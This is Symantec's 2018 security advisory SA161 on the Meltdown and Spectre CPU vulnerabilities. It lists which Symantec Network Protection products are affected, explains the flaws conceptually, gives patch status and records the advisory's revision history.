SA161: Local Information Disclosure Due to Meltdown and Spectre Attacks

Click to Subscribe
Security Advisory ID: 
SA161
Published Date: 
Jan 08, 2018
Advisory Status: 
Interim
Advisory Severity: 
Medium
CVSS v2 base score: 4.7 (AV:L/AC:M/Au:N/C:C/I:N/A:N)
CVE Number: 
CVE-2017-5715 - 4.7 (MEDIUM) (AV:L/AC:M/Au:N/C:C/I:N/A:N)
CVE-2017-5753 - 4.7 (MEDIUM) (AV:L/AC:M/Au:N/C:C/I:N/A:N)
CVE-2017-5754 - 4.7 (MEDIUM) (AV:L/AC:M/Au:N/C:C/I:N/A:N)

Symantec Network Protection products, which run on an affected CPU chipset and execute arbitrary code from external sources, are susceptible to several information disclosure vulnerabilities (aka Meltdown and Spectre attacks). A remote attacker, with the ability to execute arbitrary code locally on the target, can obtain sensitive information from the memory spaces of the same userspace application, other userspace applications, the operating system, or a VM hypervisor.

Affected Products:

The following products are vulnerable.  All hardware platforms are affected unless specified otherwise:

Content Analysis
CA 2.1, 2.2, and 2.3 are vulnerable to all CVEs when configured with on-box sandboxing.  CA 1.3 uses affected CPU chipsets, but does not allow administrators to execute arbitrary code and is not vulnerable to known vectors of attack.

Malware Analysis
MA 4.2 is vulnerable to all CVEs.

Security Analytics
Security Analytics 7.1, 7.2, and 7.3 are vulnerable to all CVEs when a malicious administrator executes malicious code on the appliance.

X-Series XOS
XOS 9.7, 10.0, and 11.0 are vulnerable to all CVEs when a malicious administrator accesses the XOS diagnostics functionality and executes malicious code on the appliance.  NPM-8620 (standalone and in X20 chassis), NPM-8650, and NPM-9600 platforms are not affected.

The following products use affected CPU chipsets, but do not allow administrators to execute arbitrary code and are not vulnerable to known vectors of attack:
Advanced Secure Gateway
CacheFlow
(CF5000-CX and CF5000-MX platforms are not affected by Meltdown)
Director
Mail Threat Defense
Management Center
Norman Shark Industrial Control System Protection
PacketShaper
PacketShaper S-Series
PolicyCenter S-Series
ProxyAV
ProxySG
(SG300, SG600, and SG9000 platforms are not affected by Meltdown)
Reporter 10.1
SSL Visibility

The following products run as userspace applications on customer-provided hardware platforms and operating systems. The vulnerabilities addressed in this security advisory are not present in our applications, but these applications can be targeted by an attacker if the underlying hardware platforms and operating systems are vulnerable:
Android Mobile Agent
AuthConnector
BCAAA
Client Connector
Cloud Data Protection for Salesforce
Cloud Data Protection for Salesforce Analytics
Cloud Data Protection for ServiceNow
Cloud Data Protection for Oracle CRM On Demand
Cloud Data Protection for Oracle Field Service Cloud
Cloud Data Protection for Oracle Sales Cloud
Cloud Data Protection Integration Server
Cloud Data Protection Communication Server
Cloud Data Protection Policy Builder
General Auth Connector Login Application
HSM Agent for the Luna SP
IntelligenceCenter
IntelligenceCenter Data Collector
K9
PolicyCenter

ProxyClient
ProxyAV ConLog and ConLogXP
Reporter 9.5
Unified Agent

Advisory Details: 

Symantec Network Protection products, which run on an affected CPU chipset and execute arbitrary code from external sources, are susceptible to several information disclosure vulnerabilities.

The Meltdown attack (CVE-2017-5754) exploits an information disclosure vulnerability in CPU chipsets that support out-of-order execution. CPU chipsets from multiple vendors use out-of-order execution to improve instruction execution performance.  Modern operating systems rely on memory isolation between userspace applications and the operating system kernel.  If a userspace application attempts to access a memory location reserved for the operating system, the system triggers an exception.  A CPU chipset supporting out-of-order execution may fetch sensitive data and store it in the CPU cache before detecting the exception. The data remains uncleared in the CPU cache, where a malicious userspace application can access it via side-channel analysis.  The Meltdown attack also allows malicious userspace applications to access sensitive data from the memory spaces of other userspace applications.

The Spectre attack (CVE-2017-5753 and CVE-2017-5715) exploits an information disclosure vulnerability in CPU chipsets that support speculative execution through branch prediction.  CPU chipsets from multiple vendors use branch prediction to improve instruction execution performance. A malicious userspace application can obtain unauthorized access to sensitive data from the memory space of the same or a different userspace application by accessing data left uncleared in the CPU cache after speculatively executed CPU instructions. In one variant of the Spectre attack (CVE-2017-5753), the speculatively executed instructions follow an incorrect branch prediction. In a second variant (CVE-2017-5715), the instructions are loaded from the location of a mispredicted branch target.  CVE-2017-5715 may also allow malicious code running as a guest in a virtual machine to obtain unauthorized access to sensitive data from the VM hypervisor memory.

The vulnerabilities addressed in this security advisory are not present in Symantec Network Protection products that run as userspace applications, but these applications can be targeted by an attacker if the underlying hardware platforms and operating systems are vulnerable. Symantec urges our customers to contact their operating system and hardware platform vendors for Meltdown/Spectre vulnerability information and fixes.

Patches: 

Content Analysis
CA 2.3 - a fix is not available at this time.
CA 2.2 - a fix is not available at this time.
CA 2.1 - a fix is not available at this time.

Malware Analysis
MA 4.2 - a fix is not available at this time.

Security Analytics
Security Analytics 7.3 - a fix is not available at this time.
Security Analytics 7.2 - a fix is not available at this time.
Security Analytics 7.1 - a fix is not available at this time.

X-Series XOS
XOS 11.0 - a fix is not available at this time.
XOS 10.0 - a fix is not available at this time.
XOS 9.7 - a fix is not available at this time.

Advisory History: 

2018-04-22 CA 2.3 is vulnerable.
2018-04-01 All hardware platforms are affected unless specified otherwise in the Affected Products section.
2018-01-09 PolicyCenter (non S-Series) and Reporter 9.5 run as userspace applications on customer-provided hardware platforms and operating systems. The vulnerabilities addressed in this security advisory are not present in these applications, but they can be targeted by an attacker if the underlying hardware platforms and operating systems are vulnerable.
2018-01-08 initial public release